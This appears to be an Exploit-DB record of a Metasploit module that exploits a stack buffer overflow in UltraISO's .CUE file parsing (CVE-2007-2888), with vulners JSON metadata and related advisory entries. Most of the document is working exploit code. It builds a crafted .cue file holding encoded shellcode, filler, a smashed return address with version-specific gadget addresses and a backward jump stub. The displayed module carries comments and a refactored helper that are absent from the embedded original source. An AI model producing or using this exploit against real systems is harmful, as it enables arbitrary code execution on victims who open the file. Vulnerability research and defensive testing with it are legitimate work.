ID EDB-ID:16627 Type exploitdb Reporter metasploit Modified 2010-04-30T00:00:00
Description
UltraISO CUE File Parsing Buffer Overflow. CVE-2007-2888. Local exploit for windows platform
##
# $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
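class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraISO CUE File Parsing Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in EZB Systems, Inc's
        UltraISO. When processing .CUE files, data is read from file into a
        fixed-size stack buffer. Since no bounds checking is done, a buffer overflow
        can occur. Attackers can execute arbitrary code by convincing their victim
        to open an CUE file.

        NOTE: A file with the same base name, but the extension of "bin" must also
        exist. Opening either file will trigger the vulnerability, but the files must
        both exist.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'n00b',  # original discovery
          'jduck'  # metasploit version
        ],
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          [ 'CVE', '2007-2888' ],
          [ 'OSVDB', '36570' ],
          [ 'BID', '24140' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/3978' ]
        ],
      'Payload'        =>
        {
          # 1024 bytes of payload always fits in front of the jmp stub at
          # Offset - JmpOff (1100 - 0x30 = 1052) plus the leading quote.
          'Space'          => 1024,
          # NUL, CR, LF terminate the FILE token; '"' closes the quoted name.
          'BadChars'       => "\x00\x0a\x0d\x22",
          'DisableNops'    => true,
          # add esp, -0xdac: move esp away from the payload so the decoder
          # stub's own stack writes do not trample the shellcode it decodes.
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # BOF @ 0x005e1f8b

          # The EXE base addr contains a bad char (nul). This prevents us from
          # writing data after the return address. NOTE: An SEH exploit was
          # originally created for this vuln, but was tossed in favor of using
          # the return address method instead. This is due to the offset being
          # stable across different open methods.
          [ 'Windows - UltraISO v8.6.2.2011 portable',
            {
              'Offset' => 1100,
              'JmpOff' => 0x30,        # offset from the end to our jmp
              'Ret'    => 0x00594740   # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
            }
          ],
          [ 'Windows - UltraISO v8.6.0.1936',
            {
              'Offset' => 1100,
              'JmpOff' => 0x30,        # offset from the end to our jmp
              'Ret'    => 0x0059170c   # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'May 24 2007',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.cue']),
      ], self.class)
  end

  # Write the malicious .cue and an empty companion .bin next to it.
  #
  # Layout of the over-long quoted FILE name (offsets within `sploit`):
  #   [0]                  opening '"' (CUE syntax; must never be executed)
  #   [1 ..]               encoded payload
  #   [.. off - jmpoff)    alphanumeric filler
  #   [off - jmpoff]       short backward `jmp` landing on offset 1 (payload start)
  #   [off, off + 4)       saved return address, replaced with target.ret
  #
  # target.ret is documented on each target as an "add esp, 0x64 / pop/pop/pop/ret"
  # gadget; the module relies on it delivering control to the jmp stub placed
  # JmpOff bytes before the return address (how the stack gets there is not
  # visible in this file). Nothing can be placed after the return address
  # because the image base contains a NUL, which is a bad character.
  #
  # The companion .bin is derived from FILENAME by replacing its extension,
  # whatever it is. The previous gsub(/\.cue$/) only matched a lower-case
  # '.cue' suffix, so e.g. FILENAME=evil.CUE or evil.txt produced a .bin path
  # equal to the .cue path and the empty-file write truncated the exploit
  # file that had just been created. Aborts before writing anything if the
  # two names would still collide (FILENAME already ends in '.bin').
  def exploit
    off    = target['Offset']
    jmpoff = target['JmpOff']

    cue_name = datastore['FILENAME']
    bin_name = companion_bin_name(cue_name)
    if bin_name == cue_name
      print_error("FILENAME must not end in '.bin': the companion file would overwrite the .cue")
      return
    end

    sploit = "\""
    sploit << payload.encoded
    sploit << rand_text_alphanumeric(off - sploit.length)

    # Smashed return address..
    sploit[off, 4] = [target.ret].pack('V')

    # We utilize a single instruction near the end of the buffer space to
    # jump back to the beginning of the buffer..
    distance = off - jmpoff
    distance -= 1 # dont execute the quote character!
    jmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
    sploit[off - jmpoff, jmp.length] = jmp

    sploit << ".BIN\""

    cue_data = "FILE "
    cue_data << sploit
    cue_data << " BINARY\r\n"
    cue_data << "  TRACK 01 MODE1/2352\r\n"
    cue_data << "    INDEX 01 00:00:00\r\n"

    print_status("Creating '#{cue_name}' using target '#{target.name}' ...")
    file_create(cue_data)

    # create the empty BIN file (same directory as the .cue, see OUTPUTPATH)
    out = File.expand_path(File.join(datastore['OUTPUTPATH'], bin_name))
    File.open(out, 'wb') { |f| f }
    print_status("Created empty output file #{out}")
  end

  private

  # Name of the .bin that must sit beside the .cue: FILENAME with its
  # extension (if any, in any case) swapped for '.bin'. Any directory part of
  # FILENAME is kept so both files end up in the same place.
  def companion_bin_name(cue_name)
    ext  = File.extname(cue_name)
    stem = ext.empty? ? cue_name : cue_name[0...-ext.length]
    stem + '.bin'
  end
end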
{"hash": "83a98c94327ea7cc7735234fe8f8ab9edbe6819febe74c84926198c23595e470", "id": "EDB-ID:16627", "lastseen": "2016-02-02T06:07:08", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/16627/", "description": "UltraISO CUE File Parsing Buffer Overflow. CVE-2007-2888. Local exploit for windows platform", "title": "UltraISO CUE File Parsing Buffer Overflow", "sourceData": "##\r\n# $Id: ultraiso_cue.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'UltraISO CUE File Parsing Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\r\n\t\t\t\tUltraISO. When processing .CUE files, data is read from file into a\r\n\t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\r\n\t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\r\n\t\t\t\tto open an CUE file.\r\n\r\n\t\t\t\tNOTE: A file with the same base name, but the extension of \"bin\" must also\r\n\t\t\t\texist. 
Opening either file will trigger the vulnerability, but the files must\r\n\t\t\t\tboth exist.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' \t =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'n00b', # original discovery\r\n\t\t\t\t\t'jduck' # metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2888' ],\r\n\t\t\t\t\t[ 'OSVDB', '36570' ],\r\n\t\t\t\t\t[ 'BID', '24140' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/3978' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x22\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# BOF @ 0x005e1f8b\r\n\r\n\t\t\t\t\t# The EXE base addr contains a bad char (nul). This prevents us from\r\n\t\t\t\t\t# writing data after the return address. NOTE: An SEH exploit was\r\n\t\t\t\t\t# originally created for this vuln, but was tossed in favor of using\r\n\t\t\t\t\t# the return address method instead. 
This is due to the offset being\r\n\t\t\t\t\t# stable across different open methods.\r\n\r\n\t\t\t\t\t[ 'Windows - UltraISO v8.6.2.2011 portable',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1100,\r\n\t\t\t\t\t\t\t'JmpOff' => 0x30, # offset from the end to our jmp\r\n\t\t\t\t\t\t\t'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows - UltraISO v8.6.0.1936',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1100,\r\n\t\t\t\t\t\t\t'JmpOff' => 0x30, # offset from the end to our jmp\r\n\t\t\t\t\t\t\t'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'May 24 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.cue']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\toff = target['Offset']\r\n\t\tjmpoff = target['JmpOff']\r\n\r\n\t\tsploit = \"\\\"\"\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << rand_text_alphanumeric(off - sploit.length)\r\n\r\n\t\t# Smashed return address..\r\n\t\tsploit[off, 4] = [target.ret].pack('V')\r\n\r\n\t\t# We utilize a single instruction near the end of the buffer space to\r\n\t\t# jump back to the beginning of the buffer..\r\n\t\tdistance = off - jmpoff\r\n\t\tdistance -= 1 # dont execute the quote character!\r\n\t\tjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\tsploit[off - jmpoff, jmp.length] = jmp\r\n\r\n\t\tsploit << \".BIN\\\"\"\r\n\r\n\t\tcue_data = \"FILE \"\r\n\t\tcue_data << sploit\r\n\t\tcue_data << \" BINARY\\r\\n\"\r\n\t\tcue_data << \" TRACK 01 MODE1/2352\\r\\n\"\r\n\t\tcue_data << \" INDEX 01 00:00:00\\r\\n\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...\")\r\n\t\tfile_create(cue_data)\r\n\r\n\t\t# create the empty 
BIN file\r\n\t\tbinfn = datastore['FILENAME'].dup\r\n\t\tbinfn.gsub!(/\\.cue$/, '.bin')\r\n\t\tout = File.expand_path(File.join(datastore['OUTPUTPATH'], binfn))\r\n\t\tFile.new(out,\"wb\").close\r\n\t\tprint_status(\"Created empty output file #{out}\")\r\n\r\n\tend\r\n\r\nend\r\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-2888"], "published": "2010-04-30T00:00:00", "osvdbidlist": ["36570"], "references": [], "reporter": "metasploit", "modified": "2010-04-30T00:00:00", "href": "https://www.exploit-db.com/exploits/16627/"}
{"result": {"cve": [{"id": "CVE-2007-2888", "type": "cve", "title": "CVE-2007-2888", "description": "Stack-based buffer overflow in UltraISO 8.6.2.2011 and earlier allows user-assisted remote attackers to execute arbitrary code via a long FILE string (filename) in a .cue file, a related issue to CVE-2007-2761. NOTE: some details are obtained from third party information.", "published": "2007-05-29T21:30:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2888", "cvelist": ["CVE-2007-2888"], "lastseen": "2017-10-11T11:07:10"}], "exploitdb": [{"id": "EDB-ID:4001", "type": "exploitdb", "title": "UltraISO <= 8.6.2.2011 Cue/Bin Files Local Buffer Overflow Exploit", "description": "UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit. CVE-2007-2888. Local exploit for windows platform", "published": "2007-05-28T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/4001/", "cvelist": ["CVE-2007-2888"], "lastseen": "2016-01-31T19:52:52"}, {"id": "EDB-ID:3978", "type": "exploitdb", "title": "UltraISO <= 8.6.2.2011 Cue/Bin Files Local Buffer Overflow PoC", "description": "UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC. CVE-2007-2888. 
Dos exploit for windows platform", "published": "2007-05-24T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3978/", "cvelist": ["CVE-2007-2888"], "lastseen": "2016-01-31T19:45:00"}], "osvdb": [{"id": "OSVDB:36570", "type": "osvdb", "title": "UltraISO CUE File Parsing FILE String Overflow", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25384](https://secuniaresearch.flexerasoftware.com/advisories/25384/)\nISS X-Force ID: 34485\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3978\n[CVE-2007-2888](https://vulners.com/cve/CVE-2007-2888)\nBugtraq ID: 24140\n", "published": "2007-05-24T13:33:47", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:36570", "cvelist": ["CVE-2007-2888"], "lastseen": "2017-04-28T13:20:32"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ULTRAISO_CUE", "type": "metasploit", "title": "UltraISO CUE File Parsing Buffer Overflow", "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of \"bin\" must also exist. 
Opening either file will trigger the vulnerability, but the files must both exist.", "published": "2010-03-29T17:21:15", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-2888"], "lastseen": "2018-03-11T17:13:41"}], "packetstorm": [{"id": "PACKETSTORM:87754", "type": "packetstorm", "title": "UltraISO CUE File Parsing Buffer Overflow", "description": "", "published": "2010-03-30T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/87754/UltraISO-CUE-File-Parsing-Buffer-Overflow.html", "cvelist": ["CVE-2007-2888"], "lastseen": "2016-12-05T22:11:58"}]}}